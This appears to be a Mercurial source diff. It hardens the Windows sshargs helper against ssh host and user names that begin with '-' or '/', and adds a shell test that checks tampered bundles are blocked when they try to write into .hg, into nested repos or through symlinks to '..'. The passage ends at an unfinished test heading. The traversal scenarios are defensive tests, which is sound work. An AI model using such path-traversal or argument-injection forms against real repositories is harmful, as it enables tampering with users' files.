3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import msvcrt
11 import msvcrt
12 import os
12 import os
13 import re
13 import re
14 import stat
14 import stat
15 import sys
15 import sys
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 policy,
21 policy,
21 pycompat,
22 pycompat,
22 win32,
23 win32,
23 )
24 )
24
25
25 try:
26 try:
26 import _winreg as winreg
27 import _winreg as winreg
27 winreg.CloseKey
28 winreg.CloseKey
28 except ImportError:
29 except ImportError:
29 import winreg
30 import winreg
30
31
31 osutil = policy.importmod(r'osutil')
32 osutil = policy.importmod(r'osutil')
32
33
33 executablepath = win32.executablepath
34 executablepath = win32.executablepath
34 getuser = win32.getuser
35 getuser = win32.getuser
35 hidewindow = win32.hidewindow
36 hidewindow = win32.hidewindow
36 makedir = win32.makedir
37 makedir = win32.makedir
37 nlinks = win32.nlinks
38 nlinks = win32.nlinks
38 oslink = win32.oslink
39 oslink = win32.oslink
39 samedevice = win32.samedevice
40 samedevice = win32.samedevice
40 samefile = win32.samefile
41 samefile = win32.samefile
41 setsignalhandler = win32.setsignalhandler
42 setsignalhandler = win32.setsignalhandler
42 spawndetached = win32.spawndetached
43 spawndetached = win32.spawndetached
43 split = os.path.split
44 split = os.path.split
44 testpid = win32.testpid
45 testpid = win32.testpid
45 unlink = win32.unlink
46 unlink = win32.unlink
46
47
47 umask = 0o022
48 umask = 0o022
48
49
49 class mixedfilemodewrapper(object):
50 class mixedfilemodewrapper(object):
50 """Wraps a file handle when it is opened in read/write mode.
51 """Wraps a file handle when it is opened in read/write mode.
51
52
52 fopen() and fdopen() on Windows have a specific-to-Windows requirement
53 fopen() and fdopen() on Windows have a specific-to-Windows requirement
53 that files opened with mode r+, w+, or a+ make a call to a file positioning
54 that files opened with mode r+, w+, or a+ make a call to a file positioning
54 function when switching between reads and writes. Without this extra call,
55 function when switching between reads and writes. Without this extra call,
55 Python will raise a not very intuitive "IOError: [Errno 0] Error."
56 Python will raise a not very intuitive "IOError: [Errno 0] Error."
56
57
57 This class wraps posixfile instances when the file is opened in read/write
58 This class wraps posixfile instances when the file is opened in read/write
58 mode and automatically adds checks or inserts appropriate file positioning
59 mode and automatically adds checks or inserts appropriate file positioning
59 calls when necessary.
60 calls when necessary.
60 """
61 """
61 OPNONE = 0
62 OPNONE = 0
62 OPREAD = 1
63 OPREAD = 1
63 OPWRITE = 2
64 OPWRITE = 2
64
65
65 def __init__(self, fp):
66 def __init__(self, fp):
66 object.__setattr__(self, r'_fp', fp)
67 object.__setattr__(self, r'_fp', fp)
67 object.__setattr__(self, r'_lastop', 0)
68 object.__setattr__(self, r'_lastop', 0)
68
69
69 def __enter__(self):
70 def __enter__(self):
70 return self._fp.__enter__()
71 return self._fp.__enter__()
71
72
72 def __exit__(self, exc_type, exc_val, exc_tb):
73 def __exit__(self, exc_type, exc_val, exc_tb):
73 self._fp.__exit__(exc_type, exc_val, exc_tb)
74 self._fp.__exit__(exc_type, exc_val, exc_tb)
74
75
75 def __getattr__(self, name):
76 def __getattr__(self, name):
76 return getattr(self._fp, name)
77 return getattr(self._fp, name)
77
78
78 def __setattr__(self, name, value):
79 def __setattr__(self, name, value):
79 return self._fp.__setattr__(name, value)
80 return self._fp.__setattr__(name, value)
80
81
81 def _noopseek(self):
82 def _noopseek(self):
82 self._fp.seek(0, os.SEEK_CUR)
83 self._fp.seek(0, os.SEEK_CUR)
83
84
84 def seek(self, *args, **kwargs):
85 def seek(self, *args, **kwargs):
85 object.__setattr__(self, r'_lastop', self.OPNONE)
86 object.__setattr__(self, r'_lastop', self.OPNONE)
86 return self._fp.seek(*args, **kwargs)
87 return self._fp.seek(*args, **kwargs)
87
88
88 def write(self, d):
89 def write(self, d):
89 if self._lastop == self.OPREAD:
90 if self._lastop == self.OPREAD:
90 self._noopseek()
91 self._noopseek()
91
92
92 object.__setattr__(self, r'_lastop', self.OPWRITE)
93 object.__setattr__(self, r'_lastop', self.OPWRITE)
93 return self._fp.write(d)
94 return self._fp.write(d)
94
95
95 def writelines(self, *args, **kwargs):
96 def writelines(self, *args, **kwargs):
96 if self._lastop == self.OPREAD:
97 if self._lastop == self.OPREAD:
97 self._noopeseek()
98 self._noopeseek()
98
99
99 object.__setattr__(self, r'_lastop', self.OPWRITE)
100 object.__setattr__(self, r'_lastop', self.OPWRITE)
100 return self._fp.writelines(*args, **kwargs)
101 return self._fp.writelines(*args, **kwargs)
101
102
102 def read(self, *args, **kwargs):
103 def read(self, *args, **kwargs):
103 if self._lastop == self.OPWRITE:
104 if self._lastop == self.OPWRITE:
104 self._noopseek()
105 self._noopseek()
105
106
106 object.__setattr__(self, r'_lastop', self.OPREAD)
107 object.__setattr__(self, r'_lastop', self.OPREAD)
107 return self._fp.read(*args, **kwargs)
108 return self._fp.read(*args, **kwargs)
108
109
109 def readline(self, *args, **kwargs):
110 def readline(self, *args, **kwargs):
110 if self._lastop == self.OPWRITE:
111 if self._lastop == self.OPWRITE:
111 self._noopseek()
112 self._noopseek()
112
113
113 object.__setattr__(self, r'_lastop', self.OPREAD)
114 object.__setattr__(self, r'_lastop', self.OPREAD)
114 return self._fp.readline(*args, **kwargs)
115 return self._fp.readline(*args, **kwargs)
115
116
116 def readlines(self, *args, **kwargs):
117 def readlines(self, *args, **kwargs):
117 if self._lastop == self.OPWRITE:
118 if self._lastop == self.OPWRITE:
118 self._noopseek()
119 self._noopseek()
119
120
120 object.__setattr__(self, r'_lastop', self.OPREAD)
121 object.__setattr__(self, r'_lastop', self.OPREAD)
121 return self._fp.readlines(*args, **kwargs)
122 return self._fp.readlines(*args, **kwargs)
122
123
123 def posixfile(name, mode='r', buffering=-1):
124 def posixfile(name, mode='r', buffering=-1):
124 '''Open a file with even more POSIX-like semantics'''
125 '''Open a file with even more POSIX-like semantics'''
125 try:
126 try:
126 fp = osutil.posixfile(name, mode, buffering) # may raise WindowsError
127 fp = osutil.posixfile(name, mode, buffering) # may raise WindowsError
127
128
128 # The position when opening in append mode is implementation defined, so
129 # The position when opening in append mode is implementation defined, so
129 # make it consistent with other platforms, which position at EOF.
130 # make it consistent with other platforms, which position at EOF.
130 if 'a' in mode:
131 if 'a' in mode:
131 fp.seek(0, os.SEEK_END)
132 fp.seek(0, os.SEEK_END)
132
133
133 if '+' in mode:
134 if '+' in mode:
134 return mixedfilemodewrapper(fp)
135 return mixedfilemodewrapper(fp)
135
136
136 return fp
137 return fp
137 except WindowsError as err:
138 except WindowsError as err:
138 # convert to a friendlier exception
139 # convert to a friendlier exception
139 raise IOError(err.errno, '%s: %s' % (name, err.strerror))
140 raise IOError(err.errno, '%s: %s' % (name, err.strerror))
140
141
141 # may be wrapped by win32mbcs extension
142 # may be wrapped by win32mbcs extension
142 listdir = osutil.listdir
143 listdir = osutil.listdir
143
144
144 class winstdout(object):
145 class winstdout(object):
145 '''stdout on windows misbehaves if sent through a pipe'''
146 '''stdout on windows misbehaves if sent through a pipe'''
146
147
147 def __init__(self, fp):
148 def __init__(self, fp):
148 self.fp = fp
149 self.fp = fp
149
150
150 def __getattr__(self, key):
151 def __getattr__(self, key):
151 return getattr(self.fp, key)
152 return getattr(self.fp, key)
152
153
153 def close(self):
154 def close(self):
154 try:
155 try:
155 self.fp.close()
156 self.fp.close()
156 except IOError:
157 except IOError:
157 pass
158 pass
158
159
159 def write(self, s):
160 def write(self, s):
160 try:
161 try:
161 # This is workaround for "Not enough space" error on
162 # This is workaround for "Not enough space" error on
162 # writing large size of data to console.
163 # writing large size of data to console.
163 limit = 16000
164 limit = 16000
164 l = len(s)
165 l = len(s)
165 start = 0
166 start = 0
166 self.softspace = 0
167 self.softspace = 0
167 while start < l:
168 while start < l:
168 end = start + limit
169 end = start + limit
169 self.fp.write(s[start:end])
170 self.fp.write(s[start:end])
170 start = end
171 start = end
171 except IOError as inst:
172 except IOError as inst:
172 if inst.errno != 0:
173 if inst.errno != 0:
173 raise
174 raise
174 self.close()
175 self.close()
175 raise IOError(errno.EPIPE, 'Broken pipe')
176 raise IOError(errno.EPIPE, 'Broken pipe')
176
177
177 def flush(self):
178 def flush(self):
178 try:
179 try:
179 return self.fp.flush()
180 return self.fp.flush()
180 except IOError as inst:
181 except IOError as inst:
181 if inst.errno != errno.EINVAL:
182 if inst.errno != errno.EINVAL:
182 raise
183 raise
183 raise IOError(errno.EPIPE, 'Broken pipe')
184 raise IOError(errno.EPIPE, 'Broken pipe')
184
185
185 def _is_win_9x():
186 def _is_win_9x():
186 '''return true if run on windows 95, 98 or me.'''
187 '''return true if run on windows 95, 98 or me.'''
187 try:
188 try:
188 return sys.getwindowsversion()[3] == 1
189 return sys.getwindowsversion()[3] == 1
189 except AttributeError:
190 except AttributeError:
190 return 'command' in encoding.environ.get('comspec', '')
191 return 'command' in encoding.environ.get('comspec', '')
191
192
192 def openhardlinks():
193 def openhardlinks():
193 return not _is_win_9x()
194 return not _is_win_9x()
194
195
195 def parsepatchoutput(output_line):
196 def parsepatchoutput(output_line):
196 """parses the output produced by patch and returns the filename"""
197 """parses the output produced by patch and returns the filename"""
197 pf = output_line[14:]
198 pf = output_line[14:]
198 if pf[0] == '`':
199 if pf[0] == '`':
199 pf = pf[1:-1] # Remove the quotes
200 pf = pf[1:-1] # Remove the quotes
200 return pf
201 return pf
201
202
202 def sshargs(sshcmd, host, user, port):
203 def sshargs(sshcmd, host, user, port):
203 '''Build argument list for ssh or Plink'''
204 '''Build argument list for ssh or Plink'''
204 pflag = 'plink' in sshcmd.lower() and '-P' or '-p'
205 pflag = 'plink' in sshcmd.lower() and '-P' or '-p'
205 args = user and ("%s@%s" % (user, host)) or host
206 args = user and ("%s@%s" % (user, host)) or host
206 return port and ("%s %s %s" % (args, pflag, port)) or args
207 if args.startswith('-') or args.startswith('/'):
208 raise error.Abort(
209 _('illegal ssh hostname or username starting with - or /: %s') %
210 args)
211 args = shellquote(args)
212 if port:
213 args = '%s %s %s' % (pflag, shellquote(port), args)
214 return args
207
215
208 def setflags(f, l, x):
216 def setflags(f, l, x):
209 pass
217 pass
210
218
211 def copymode(src, dst, mode=None):
219 def copymode(src, dst, mode=None):
212 pass
220 pass
213
221
214 def checkexec(path):
222 def checkexec(path):
215 return False
223 return False
216
224
217 def checklink(path):
225 def checklink(path):
218 return False
226 return False
219
227
220 def setbinary(fd):
228 def setbinary(fd):
221 # When run without console, pipes may expose invalid
229 # When run without console, pipes may expose invalid
222 # fileno(), usually set to -1.
230 # fileno(), usually set to -1.
223 fno = getattr(fd, 'fileno', None)
231 fno = getattr(fd, 'fileno', None)
224 if fno is not None and fno() >= 0:
232 if fno is not None and fno() >= 0:
225 msvcrt.setmode(fno(), os.O_BINARY)
233 msvcrt.setmode(fno(), os.O_BINARY)
226
234
227 def pconvert(path):
235 def pconvert(path):
228 return path.replace(pycompat.ossep, '/')
236 return path.replace(pycompat.ossep, '/')
229
237
230 def localpath(path):
238 def localpath(path):
231 return path.replace('/', '\\')
239 return path.replace('/', '\\')
232
240
233 def normpath(path):
241 def normpath(path):
234 return pconvert(os.path.normpath(path))
242 return pconvert(os.path.normpath(path))
235
243
236 def normcase(path):
244 def normcase(path):
237 return encoding.upper(path) # NTFS compares via upper()
245 return encoding.upper(path) # NTFS compares via upper()
238
246
239 # see posix.py for definitions
247 # see posix.py for definitions
240 normcasespec = encoding.normcasespecs.upper
248 normcasespec = encoding.normcasespecs.upper
241 normcasefallback = encoding.upperfallback
249 normcasefallback = encoding.upperfallback
242
250
243 def samestat(s1, s2):
251 def samestat(s1, s2):
244 return False
252 return False
245
253
246 # A sequence of backslashes is special iff it precedes a double quote:
254 # A sequence of backslashes is special iff it precedes a double quote:
247 # - if there's an even number of backslashes, the double quote is not
255 # - if there's an even number of backslashes, the double quote is not
248 # quoted (i.e. it ends the quoted region)
256 # quoted (i.e. it ends the quoted region)
249 # - if there's an odd number of backslashes, the double quote is quoted
257 # - if there's an odd number of backslashes, the double quote is quoted
250 # - in both cases, every pair of backslashes is unquoted into a single
258 # - in both cases, every pair of backslashes is unquoted into a single
251 # backslash
259 # backslash
252 # (See http://msdn2.microsoft.com/en-us/library/a1y7w461.aspx )
260 # (See http://msdn2.microsoft.com/en-us/library/a1y7w461.aspx )
253 # So, to quote a string, we must surround it in double quotes, double
261 # So, to quote a string, we must surround it in double quotes, double
254 # the number of backslashes that precede double quotes and add another
262 # the number of backslashes that precede double quotes and add another
255 # backslash before every double quote (being careful with the double
263 # backslash before every double quote (being careful with the double
256 # quote we've appended to the end)
264 # quote we've appended to the end)
257 _quotere = None
265 _quotere = None
258 _needsshellquote = None
266 _needsshellquote = None
259 def shellquote(s):
267 def shellquote(s):
260 r"""
268 r"""
261 >>> shellquote(r'C:\Users\xyz')
269 >>> shellquote(r'C:\Users\xyz')
262 '"C:\\Users\\xyz"'
270 '"C:\\Users\\xyz"'
263 >>> shellquote(r'C:\Users\xyz/mixed')
271 >>> shellquote(r'C:\Users\xyz/mixed')
264 '"C:\\Users\\xyz/mixed"'
272 '"C:\\Users\\xyz/mixed"'
265 >>> # Would be safe not to quote too, since it is all double backslashes
273 >>> # Would be safe not to quote too, since it is all double backslashes
266 >>> shellquote(r'C:\\Users\\xyz')
274 >>> shellquote(r'C:\\Users\\xyz')
267 '"C:\\\\Users\\\\xyz"'
275 '"C:\\\\Users\\\\xyz"'
268 >>> # But this must be quoted
276 >>> # But this must be quoted
269 >>> shellquote(r'C:\\Users\\xyz/abc')
277 >>> shellquote(r'C:\\Users\\xyz/abc')
270 '"C:\\\\Users\\\\xyz/abc"'
278 '"C:\\\\Users\\\\xyz/abc"'
271 """
279 """
272 global _quotere
280 global _quotere
273 if _quotere is None:
281 if _quotere is None:
274 _quotere = re.compile(r'(\\*)("|\\$)')
282 _quotere = re.compile(r'(\\*)("|\\$)')
275 global _needsshellquote
283 global _needsshellquote
276 if _needsshellquote is None:
284 if _needsshellquote is None:
277 # ":" is also treated as "safe character", because it is used as a part
285 # ":" is also treated as "safe character", because it is used as a part
278 # of path name on Windows. "\" is also part of a path name, but isn't
286 # of path name on Windows. "\" is also part of a path name, but isn't
279 # safe because shlex.split() (kind of) treats it as an escape char and
287 # safe because shlex.split() (kind of) treats it as an escape char and
280 # drops it. It will leave the next character, even if it is another
288 # drops it. It will leave the next character, even if it is another
281 # "\".
289 # "\".
282 _needsshellquote = re.compile(r'[^a-zA-Z0-9._:/-]').search
290 _needsshellquote = re.compile(r'[^a-zA-Z0-9._:/-]').search
283 if s and not _needsshellquote(s) and not _quotere.search(s):
291 if s and not _needsshellquote(s) and not _quotere.search(s):
284 # "s" shouldn't have to be quoted
292 # "s" shouldn't have to be quoted
285 return s
293 return s
286 return '"%s"' % _quotere.sub(r'\1\1\\\2', s)
294 return '"%s"' % _quotere.sub(r'\1\1\\\2', s)
287
295
288 def quotecommand(cmd):
296 def quotecommand(cmd):
289 """Build a command string suitable for os.popen* calls."""
297 """Build a command string suitable for os.popen* calls."""
290 if sys.version_info < (2, 7, 1):
298 if sys.version_info < (2, 7, 1):
291 # Python versions since 2.7.1 do this extra quoting themselves
299 # Python versions since 2.7.1 do this extra quoting themselves
292 return '"' + cmd + '"'
300 return '"' + cmd + '"'
293 return cmd
301 return cmd
294
302
295 def popen(command, mode='r'):
303 def popen(command, mode='r'):
296 # Work around "popen spawned process may not write to stdout
304 # Work around "popen spawned process may not write to stdout
297 # under windows"
305 # under windows"
298 # http://bugs.python.org/issue1366
306 # http://bugs.python.org/issue1366
299 command += " 2> %s" % os.devnull
307 command += " 2> %s" % os.devnull
300 return os.popen(quotecommand(command), mode)
308 return os.popen(quotecommand(command), mode)
301
309
302 def explainexit(code):
310 def explainexit(code):
303 return _("exited with status %d") % code, code
311 return _("exited with status %d") % code, code
304
312
305 # if you change this stub into a real check, please try to implement the
313 # if you change this stub into a real check, please try to implement the
306 # username and groupname functions above, too.
314 # username and groupname functions above, too.
307 def isowner(st):
315 def isowner(st):
308 return True
316 return True
309
317
310 def findexe(command):
318 def findexe(command):
311 '''Find executable for command searching like cmd.exe does.
319 '''Find executable for command searching like cmd.exe does.
312 If command is a basename then PATH is searched for command.
320 If command is a basename then PATH is searched for command.
313 PATH isn't searched if command is an absolute or relative path.
321 PATH isn't searched if command is an absolute or relative path.
314 An extension from PATHEXT is found and added if not present.
322 An extension from PATHEXT is found and added if not present.
315 If command isn't found None is returned.'''
323 If command isn't found None is returned.'''
316 pathext = encoding.environ.get('PATHEXT', '.COM;.EXE;.BAT;.CMD')
324 pathext = encoding.environ.get('PATHEXT', '.COM;.EXE;.BAT;.CMD')
317 pathexts = [ext for ext in pathext.lower().split(pycompat.ospathsep)]
325 pathexts = [ext for ext in pathext.lower().split(pycompat.ospathsep)]
318 if os.path.splitext(command)[1].lower() in pathexts:
326 if os.path.splitext(command)[1].lower() in pathexts:
319 pathexts = ['']
327 pathexts = ['']
320
328
321 def findexisting(pathcommand):
329 def findexisting(pathcommand):
322 'Will append extension (if needed) and return existing file'
330 'Will append extension (if needed) and return existing file'
323 for ext in pathexts:
331 for ext in pathexts:
324 executable = pathcommand + ext
332 executable = pathcommand + ext
325 if os.path.exists(executable):
333 if os.path.exists(executable):
326 return executable
334 return executable
327 return None
335 return None
328
336
329 if pycompat.ossep in command:
337 if pycompat.ossep in command:
330 return findexisting(command)
338 return findexisting(command)
331
339
332 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
340 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
333 executable = findexisting(os.path.join(path, command))
341 executable = findexisting(os.path.join(path, command))
334 if executable is not None:
342 if executable is not None:
335 return executable
343 return executable
336 return findexisting(os.path.expanduser(os.path.expandvars(command)))
344 return findexisting(os.path.expanduser(os.path.expandvars(command)))
337
345
338 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
346 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
339
347
340 def statfiles(files):
348 def statfiles(files):
341 '''Stat each file in files. Yield each stat, or None if a file
349 '''Stat each file in files. Yield each stat, or None if a file
342 does not exist or has a type we don't care about.
350 does not exist or has a type we don't care about.
343
351
344 Cluster and cache stat per directory to minimize number of OS stat calls.'''
352 Cluster and cache stat per directory to minimize number of OS stat calls.'''
345 dircache = {} # dirname -> filename -> status | None if file does not exist
353 dircache = {} # dirname -> filename -> status | None if file does not exist
346 getkind = stat.S_IFMT
354 getkind = stat.S_IFMT
347 for nf in files:
355 for nf in files:
348 nf = normcase(nf)
356 nf = normcase(nf)
349 dir, base = os.path.split(nf)
357 dir, base = os.path.split(nf)
350 if not dir:
358 if not dir:
351 dir = '.'
359 dir = '.'
352 cache = dircache.get(dir, None)
360 cache = dircache.get(dir, None)
353 if cache is None:
361 if cache is None:
354 try:
362 try:
355 dmap = dict([(normcase(n), s)
363 dmap = dict([(normcase(n), s)
356 for n, k, s in listdir(dir, True)
364 for n, k, s in listdir(dir, True)
357 if getkind(s.st_mode) in _wantedkinds])
365 if getkind(s.st_mode) in _wantedkinds])
358 except OSError as err:
366 except OSError as err:
359 # Python >= 2.5 returns ENOENT and adds winerror field
367 # Python >= 2.5 returns ENOENT and adds winerror field
360 # EINVAL is raised if dir is not a directory.
368 # EINVAL is raised if dir is not a directory.
361 if err.errno not in (errno.ENOENT, errno.EINVAL,
369 if err.errno not in (errno.ENOENT, errno.EINVAL,
362 errno.ENOTDIR):
370 errno.ENOTDIR):
363 raise
371 raise
364 dmap = {}
372 dmap = {}
365 cache = dircache.setdefault(dir, dmap)
373 cache = dircache.setdefault(dir, dmap)
366 yield cache.get(base, None)
374 yield cache.get(base, None)
367
375
368 def username(uid=None):
376 def username(uid=None):
369 """Return the name of the user with the given uid.
377 """Return the name of the user with the given uid.
370
378
371 If uid is None, return the name of the current user."""
379 If uid is None, return the name of the current user."""
372 return None
380 return None
373
381
374 def groupname(gid=None):
382 def groupname(gid=None):
375 """Return the name of the group with the given gid.
383 """Return the name of the group with the given gid.
376
384
377 If gid is None, return the name of the current group."""
385 If gid is None, return the name of the current group."""
378 return None
386 return None
379
387
380 def removedirs(name):
388 def removedirs(name):
381 """special version of os.removedirs that does not remove symlinked
389 """special version of os.removedirs that does not remove symlinked
382 directories or junction points if they actually contain files"""
390 directories or junction points if they actually contain files"""
383 if listdir(name):
391 if listdir(name):
384 return
392 return
385 os.rmdir(name)
393 os.rmdir(name)
386 head, tail = os.path.split(name)
394 head, tail = os.path.split(name)
387 if not tail:
395 if not tail:
388 head, tail = os.path.split(head)
396 head, tail = os.path.split(head)
389 while head and tail:
397 while head and tail:
390 try:
398 try:
391 if listdir(head):
399 if listdir(head):
392 return
400 return
393 os.rmdir(head)
401 os.rmdir(head)
394 except (ValueError, OSError):
402 except (ValueError, OSError):
395 break
403 break
396 head, tail = os.path.split(head)
404 head, tail = os.path.split(head)
397
405
398 def rename(src, dst):
406 def rename(src, dst):
399 '''atomically rename file src to dst, replacing dst if it exists'''
407 '''atomically rename file src to dst, replacing dst if it exists'''
400 try:
408 try:
401 os.rename(src, dst)
409 os.rename(src, dst)
402 except OSError as e:
410 except OSError as e:
403 if e.errno != errno.EEXIST:
411 if e.errno != errno.EEXIST:
404 raise
412 raise
405 unlink(dst)
413 unlink(dst)
406 os.rename(src, dst)
414 os.rename(src, dst)
407
415
408 def gethgcmd():
416 def gethgcmd():
409 return [sys.executable] + sys.argv[:1]
417 return [sys.executable] + sys.argv[:1]
410
418
411 def groupmembers(name):
419 def groupmembers(name):
412 # Don't support groups on Windows for now
420 # Don't support groups on Windows for now
413 raise KeyError
421 raise KeyError
414
422
415 def isexec(f):
423 def isexec(f):
416 return False
424 return False
417
425
418 class cachestat(object):
426 class cachestat(object):
419 def __init__(self, path):
427 def __init__(self, path):
420 pass
428 pass
421
429
422 def cacheable(self):
430 def cacheable(self):
423 return False
431 return False
424
432
425 def lookupreg(key, valname=None, scope=None):
433 def lookupreg(key, valname=None, scope=None):
426 ''' Look up a key/value name in the Windows registry.
434 ''' Look up a key/value name in the Windows registry.
427
435
428 valname: value name. If unspecified, the default value for the key
436 valname: value name. If unspecified, the default value for the key
429 is used.
437 is used.
430 scope: optionally specify scope for registry lookup, this can be
438 scope: optionally specify scope for registry lookup, this can be
431 a sequence of scopes to look up in order. Default (CURRENT_USER,
439 a sequence of scopes to look up in order. Default (CURRENT_USER,
432 LOCAL_MACHINE).
440 LOCAL_MACHINE).
433 '''
441 '''
434 if scope is None:
442 if scope is None:
435 scope = (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE)
443 scope = (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE)
436 elif not isinstance(scope, (list, tuple)):
444 elif not isinstance(scope, (list, tuple)):
437 scope = (scope,)
445 scope = (scope,)
438 for s in scope:
446 for s in scope:
439 try:
447 try:
440 val = winreg.QueryValueEx(winreg.OpenKey(s, key), valname)[0]
448 val = winreg.QueryValueEx(winreg.OpenKey(s, key), valname)[0]
441 # never let a Unicode string escape into the wild
449 # never let a Unicode string escape into the wild
442 return encoding.unitolocal(val)
450 return encoding.unitolocal(val)
443 except EnvironmentError:
451 except EnvironmentError:
444 pass
452 pass
445
453
446 expandglobs = True
454 expandglobs = True
447
455
448 def statislink(st):
456 def statislink(st):
449 '''check whether a stat result is a symlink'''
457 '''check whether a stat result is a symlink'''
450 return False
458 return False
451
459
452 def statisexec(st):
460 def statisexec(st):
453 '''check whether a stat result is an executable file'''
461 '''check whether a stat result is an executable file'''
454 return False
462 return False
455
463
456 def poll(fds):
464 def poll(fds):
457 # see posix.py for description
465 # see posix.py for description
458 raise NotImplementedError()
466 raise NotImplementedError()
459
467
460 def readpipe(pipe):
468 def readpipe(pipe):
461 """Read all available data from a pipe."""
469 """Read all available data from a pipe."""
462 chunks = []
470 chunks = []
463 while True:
471 while True:
464 size = win32.peekpipe(pipe)
472 size = win32.peekpipe(pipe)
465 if not size:
473 if not size:
466 break
474 break
467
475
468 s = pipe.read(size)
476 s = pipe.read(size)
469 if not s:
477 if not s:
470 break
478 break
471 chunks.append(s)
479 chunks.append(s)
472
480
473 return ''.join(chunks)
481 return ''.join(chunks)
474
482
475 def bindunixsocket(sock, path):
483 def bindunixsocket(sock, path):
476 raise NotImplementedError('unsupported platform')
484 raise NotImplementedError('unsupported platform')
@@ -1,131 +1,231 b''
1 $ hg init
1 $ hg init
2
2
3 audit of .hg
3 audit of .hg
4
4
5 $ hg add .hg/00changelog.i
5 $ hg add .hg/00changelog.i
6 abort: path contains illegal component: .hg/00changelog.i (glob)
6 abort: path contains illegal component: .hg/00changelog.i (glob)
7 [255]
7 [255]
8
8
9 #if symlink
9 #if symlink
10
10
11 Symlinks
11 Symlinks
12
12
13 $ mkdir a
13 $ mkdir a
14 $ echo a > a/a
14 $ echo a > a/a
15 $ hg ci -Ama
15 $ hg ci -Ama
16 adding a/a
16 adding a/a
17 $ ln -s a b
17 $ ln -s a b
18 $ echo b > a/b
18 $ echo b > a/b
19 $ hg add b/b
19 $ hg add b/b
20 abort: path 'b/b' traverses symbolic link 'b' (glob)
20 abort: path 'b/b' traverses symbolic link 'b' (glob)
21 [255]
21 [255]
22 $ hg add b
22 $ hg add b
23
23
24 should still fail - maybe
24 should still fail - maybe
25
25
26 $ hg add b/b
26 $ hg add b/b
27 abort: path 'b/b' traverses symbolic link 'b' (glob)
27 abort: path 'b/b' traverses symbolic link 'b' (glob)
28 [255]
28 [255]
29
29
30 $ hg commit -m 'add symlink b'
30 $ hg commit -m 'add symlink b'
31
31
32
32
33 Test symlink traversing when accessing history:
33 Test symlink traversing when accessing history:
34 -----------------------------------------------
34 -----------------------------------------------
35
35
36 (build a changeset where the path exists as a directory)
36 (build a changeset where the path exists as a directory)
37
37
38 $ hg up 0
38 $ hg up 0
39 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
39 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
40 $ mkdir b
40 $ mkdir b
41 $ echo c > b/a
41 $ echo c > b/a
42 $ hg add b/a
42 $ hg add b/a
43 $ hg ci -m 'add directory b'
43 $ hg ci -m 'add directory b'
44 created new head
44 created new head
45
45
46 Test that hg cat does not do anything wrong the working copy has 'b' as directory
46 Test that hg cat does not do anything wrong the working copy has 'b' as directory
47
47
48 $ hg cat b/a
48 $ hg cat b/a
49 c
49 c
50 $ hg cat -r "desc(directory)" b/a
50 $ hg cat -r "desc(directory)" b/a
51 c
51 c
52 $ hg cat -r "desc(symlink)" b/a
52 $ hg cat -r "desc(symlink)" b/a
53 b/a: no such file in rev bc151a1f53bd
53 b/a: no such file in rev bc151a1f53bd
54 [1]
54 [1]
55
55
56 Test that hg cat does not do anything wrong the working copy has 'b' as a symlink (issue4749)
56 Test that hg cat does not do anything wrong the working copy has 'b' as a symlink (issue4749)
57
57
58 $ hg up 'desc(symlink)'
58 $ hg up 'desc(symlink)'
59 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
59 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
60 $ hg cat b/a
60 $ hg cat b/a
61 b/a: no such file in rev bc151a1f53bd
61 b/a: no such file in rev bc151a1f53bd
62 [1]
62 [1]
63 $ hg cat -r "desc(directory)" b/a
63 $ hg cat -r "desc(directory)" b/a
64 c
64 c
65 $ hg cat -r "desc(symlink)" b/a
65 $ hg cat -r "desc(symlink)" b/a
66 b/a: no such file in rev bc151a1f53bd
66 b/a: no such file in rev bc151a1f53bd
67 [1]
67 [1]
68
68
69 #endif
69 #endif
70
70
71
71
72 unbundle tampered bundle
72 unbundle tampered bundle
73
73
74 $ hg init target
74 $ hg init target
75 $ cd target
75 $ cd target
76 $ hg unbundle "$TESTDIR/bundles/tampered.hg"
76 $ hg unbundle "$TESTDIR/bundles/tampered.hg"
77 adding changesets
77 adding changesets
78 adding manifests
78 adding manifests
79 adding file changes
79 adding file changes
80 added 5 changesets with 6 changes to 6 files (+4 heads)
80 added 5 changesets with 6 changes to 6 files (+4 heads)
81 (run 'hg heads' to see heads, 'hg merge' to merge)
81 (run 'hg heads' to see heads, 'hg merge' to merge)
82
82
83 attack .hg/test
83 attack .hg/test
84
84
85 $ hg manifest -r0
85 $ hg manifest -r0
86 .hg/test
86 .hg/test
87 $ hg update -Cr0
87 $ hg update -Cr0
88 abort: path contains illegal component: .hg/test (glob)
88 abort: path contains illegal component: .hg/test (glob)
89 [255]
89 [255]
90
90
91 attack foo/.hg/test
91 attack foo/.hg/test
92
92
93 $ hg manifest -r1
93 $ hg manifest -r1
94 foo/.hg/test
94 foo/.hg/test
95 $ hg update -Cr1
95 $ hg update -Cr1
96 abort: path 'foo/.hg/test' is inside nested repo 'foo' (glob)
96 abort: path 'foo/.hg/test' is inside nested repo 'foo' (glob)
97 [255]
97 [255]
98
98
99 attack back/test where back symlinks to ..
99 attack back/test where back symlinks to ..
100
100
101 $ hg manifest -r2
101 $ hg manifest -r2
102 back
102 back
103 back/test
103 back/test
104 #if symlink
104 #if symlink
105 $ hg update -Cr2
105 $ hg update -Cr2
106 abort: path 'back/test' traverses symbolic link 'back'
106 abort: path 'back/test' traverses symbolic link 'back'
107 [255]
107 [255]
108 #else
108 #else
109 ('back' will be a file and cause some other system specific error)
109 ('back' will be a file and cause some other system specific error)
110 $ hg update -Cr2
110 $ hg update -Cr2
111 abort: * (glob)
111 abort: * (glob)
112 [255]
112 [255]
113 #endif
113 #endif
114
114
115 attack ../test
